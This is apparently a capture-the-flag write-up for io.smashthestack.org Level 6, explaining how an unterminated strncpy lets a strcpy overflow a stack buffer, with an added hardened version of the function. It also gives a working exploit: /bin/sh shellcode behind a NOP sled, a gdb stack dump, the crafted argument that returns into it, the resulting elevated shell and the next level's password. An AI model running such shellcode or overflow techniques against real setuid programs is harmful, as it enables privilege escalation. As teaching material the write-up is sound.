io.smashthestack.org – Level 6

The source for the Level 6 challenge is as follows.

#include<string.h>

// The devil is in the details - nnp

void copy_buffers(char *argv[])
{
    char buf1[32], buf2[32], buf3[32];

    strncpy(buf2, argv[1], 31);
    strncpy(buf3, argv[2], sizeof(buf3));
    strcpy(buf1, buf3);
}

int main(int argc, char *argv[])
{
    copy_buffers(argv); 
    return 0;
}

At first glance nothing looks likely to overflow: every copy into buf2 and buf3 is bounded. Yet with the input below the program segfaults as soon as argv[2] reaches 32 bytes.

level6@io:/tmp/by6$ /levels/level06 `python -c "print 'A'*10 + ' ' + 'B'*31"`        
level6@io:/tmp/by6$ /levels/level06 `python -c "print 'A'*10 + ' ' + 'B'*32"` 
Segmentation fault
level6@io:/tmp/by6$ 

To see how the overflow happens, modify the code as follows (a printf after each copy), compile it (here as ./a.out) and run it with the same two inputs.

#include <stdio.h>
#include <string.h>

// The devil is in the details - nnp

void copy_buffers(char *argv[])
{
  char buf1[32], buf2[32], buf3[32];

  strncpy(buf2, argv[1], 31);           // at most 31 bytes, NUL-padded when argv[1] is shorter
  printf("%s\n", buf2);
  strncpy(buf3, argv[2], sizeof(buf3)); // n == sizeof(buf3): no NUL when argv[2] is 32+ bytes
  printf("%s\n", buf3);                 // runs on into buf2 if buf3 is unterminated
  strcpy(buf1, buf3);                   // unbounded: copies buf3 plus whatever follows it
  printf("%s\n", buf1);
}

int main(int argc, char *argv[])
{
  copy_buffers(argv);
  return 0;
}
level6@io:/tmp/by6$ ./a.out `python -c "print 'A'*10 + ' ' + 'B'*31"`         
AAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
level6@io:/tmp/by6$ ./a.out `python -c "print 'A'*10 + ' ' + 'B'*32"` 
AAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAA
Segmentation fault
level6@io:/tmp/by6$ 

So buf3 itself is not overflowing; it is filled to its last byte. strncpy(buf3, argv[2], sizeof(buf3)) copies exactly 32 bytes when argv[2] is 32 bytes long and adds no terminating NUL, so the following strcpy(buf1, buf3) keeps reading past the end of buf3 into buf2, which sits directly after it on the stack, and stops only at the NUL padding that strncpy left behind the 10 A's. The result is a 42-byte copy into the 32-byte buf1: the real overflow is in buf1, and the 10 excess bytes land on what lies above it in the frame, including the saved frame pointer and the return address of copy_buffers, which is the crash seen above.
The plan, then: put the address we want to return to in argv[1] so that it ends up in buf2 right behind buf3 (the address must contain no NUL byte, or strcpy would stop early; it is given twice so the 8 bytes cover the saved frame pointer and the return address), and give argv[2] exactly 32 bytes so buf3 loses its terminator. The shellcode goes into an environment variable with a 100-byte NOP sled in front, and its address is read off the stack in gdb. Let's attack.
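To make the mechanism concrete, here is an added example (not the level's source and not the post author's code) that reproduces the two strncpy calls with buf3 and buf2 placed next to each other in a struct, counts how far the following strcpy would read, and puts a hardened version of copy_buffers beside it. The struct layout mirrors the adjacency the output above shows the compiler chose for the locals; that adjacency, the 'X' filler and the MAX_ARG cap are assumptions of this demo, not something C guarantees.

```c
#include <stdio.h>
#include <string.h>

/* Added example. The struct guarantees that buf2 follows buf3 in memory,
 * which is the layout observed above for the locals in copy_buffers();
 * relying on that layout for stack locals is the assumption being demonstrated. */
struct frame {
    char buf3[32];
    char buf2[32];
};

#define MAX_ARG 63

/* Build argv[1] = 'A' * n_a and argv[2] = 'B' * n_b, like the python
 * one-liners on the page (both capped at MAX_ARG bytes). */
static void make_args(char *a, size_t n_a, char *b, size_t n_b)
{
    if (n_a > MAX_ARG) n_a = MAX_ARG;
    if (n_b > MAX_ARG) n_b = MAX_ARG;
    memset(a, 'A', n_a); a[n_a] = '\0';
    memset(b, 'B', n_b); b[n_b] = '\0';
}

/* Reproduce the two strncpy calls from copy_buffers() and return the number
 * of bytes strcpy(buf1, buf3) would copy: a bounded scan for the first NUL
 * starting at buf3 that is allowed to run on into buf2. With n_b >= 32,
 * strncpy leaves buf3 without a terminator and the count runs into buf2. */
size_t copied_length(size_t n_a, size_t n_b)
{
    char a[MAX_ARG + 1], b[MAX_ARG + 1];
    struct frame f;
    const char *p = (const char *)&f;   /* &f is &f.buf3[0] */
    size_t n;

    make_args(a, n_a, b, n_b);
    memset(&f, 'X', sizeof f);          /* visible filler instead of stack garbage */
    strncpy(f.buf2, a, 31);             /* NUL-pads the rest of the 31 bytes */
    strncpy(f.buf3, b, sizeof f.buf3);  /* n == sizeof: no NUL when the source is >= 32 bytes */

    for (n = 0; n < sizeof f && p[n] != '\0'; n++)
        ;
    return n;
}

/* Hardened equivalent of copy_buffers(): every strncpy is bounded at size - 1
 * and terminated explicitly, and the last copy is length-checked with snprintf
 * so it can never write past buf1. Returns strlen(buf1). */
size_t copy_buffers_fixed(size_t n_a, size_t n_b)
{
    char a[MAX_ARG + 1], b[MAX_ARG + 1];
    char buf1[32], buf2[32], buf3[32];

    make_args(a, n_a, b, n_b);
    strncpy(buf2, a, sizeof buf2 - 1);
    buf2[sizeof buf2 - 1] = '\0';
    strncpy(buf3, b, sizeof buf3 - 1);
    buf3[sizeof buf3 - 1] = '\0';
    snprintf(buf1, sizeof buf1, "%s", buf3);
    return strlen(buf1);
}

int main(void)
{
    printf("'A'*10 + 'B'*31: strcpy would copy %zu bytes\n", copied_length(10, 31));
    printf("'A'*10 + 'B'*32: strcpy would copy %zu bytes\n", copied_length(10, 32));
    printf("fixed version, same input: buf1 holds %zu bytes\n", copy_buffers_fixed(10, 32));
    return 0;
}
```

With 31 B's the count stops at the NUL strncpy wrote into buf3[31]; with 32 B's it runs through buf3 and the 10 A's in buf2 to 42 bytes, exactly the string the modified program printed. The hardened version never copies more than 31 bytes into any of the three buffers regardless of input length.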

level6@io:/tmp/by6$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level6@io:/tmp/by6$ gdb /levels/level06
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) b main
Breakpoint 1 at 0x80483fa
(gdb) r
Starting program: /levels/level06 

Breakpoint 1, 0x080483fa in main ()
(gdb) x/32wx $esp
0xbfffdca4:     0xbfffdcc0      0xbfffdd18      0x0094f455      0x08048470
0xbfffdcb4:     0x080482f0      0xbfffdd18      0x0094f455      0x00000001
0xbfffdcc4:     0xbfffdd44      0xbfffdd4c      0x0052db18      0x00000001
0xbfffdcd4:     0x00000001      0x00000000      0x0804820c      0x00a72ff4
0xbfffdce4:     0x08048470      0x080482f0      0xbfffdd18      0xebb98081
0xbfffdcf4:     0x3de835ff      0x00000000      0x00000000      0x00000000
0xbfffdd04:     0x0069f2e0      0x0094f37d      0x006a6ff4      0x00000001
0xbfffdd14:     0x080482f0      0x00000000      0x08048311      0x080483ec
(gdb) 
0xbfffdd24:     0x00000001      0xbfffdd44      0x08048470      0x08048420
0xbfffdd34:     0x0069a250      0xbfffdd3c      0x006a4ae5      0x00000001
0xbfffdd44:     0xbfffde22      0x00000000      0xbfffde32      0xbfffdebf
0xbfffdd54:     0xbfffdecf      0xbfffdeda      0xbfffdefc      0xbfffdf10
0xbfffdd64:     0xbfffdf1c      0xbfffdf28      0xbfffdf55      0xbfffdf6b
0xbfffdd74:     0xbfffdf7a      0xbfffdf87      0xbfffdf90      0xbfffdfa2
0xbfffdd84:     0xbfffdfaa      0xbfffdfb9      0x00000000      0x00000010
0xbfffdd94:     0xbfebfbff      0x00000006      0x00001000      0x00000011
(gdb) 
0xbfffdda4:     0x00000064      0x00000003      0x08048034      0x00000004
0xbfffddb4:     0x00000020      0x00000005      0x00000007      0x00000007
0xbfffddc4:     0x0068c000      0x00000008      0x00000000      0x00000009
0xbfffddd4:     0x080482f0      0x0000000b      0x000003ee      0x0000000c
0xbfffdde4:     0x000003ee      0x0000000d      0x000003ee      0x0000000e
0xbfffddf4:     0x000003ee      0x00000017      0x00000000      0x0000000f
0xbfffde04:     0xbfffde1b      0x00000000      0x00000000      0x00000000
0xbfffde14:     0x00000000      0x69000000      0x00363836      0x6c2f0000
(gdb) 
0xbfffde24:     0x6c657665      0x656c2f73      0x306c6576      0x48530036
0xbfffde34:     0x434c4c45      0x3d45444f      0x90909090      0x90909090
0xbfffde44:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde54:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde64:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde74:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde84:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde94:     0x90909090      0x90909090      0x90909090      0x3158176a
(gdb) q
The program is running.  Exit anyway? (y or n) y
level6@io:/tmp/by6$ /levels/level06 `python -c "print '\x94\xde\xff\xbf'*2 + ' ' + 'B'*32"`                 
sh-3.2$ id
uid=1006(level6) gid=1006(level6) euid=1007(level7) groups=1006(level6),1029(nosu)
sh-3.2$ cat /home/level7/.pass
qpapbi2w
sh-3.2$ 

Why 0xbfffde94 works: in the gdb dump the string "SHELLCODE=" starts at 0xbfffde32, so the 100 NOPs occupy 0xbfffde3c through 0xbfffde9f and the shellcode proper begins at 0xbfffdea0 (the word 0x3158176a is the little-endian view of its first bytes 6a 17 58 31, push 0x17 / pop eax / xor ebx,ebx for the setuid(0) attempt, followed by the execve of /bin//sh). Any address inside the sled slides into the shellcode, which is what makes the jump tolerant of the few bytes by which gdb's own environment shifts the stack relative to a normal run. The bytes \x94\xde\xff\xbf contain no NUL, so strcpy copies all 8 bytes of argv[1] out of buf2 before hitting the padding, and copy_buffers returns into the sled with the level7 euid the setuid binary already carries.
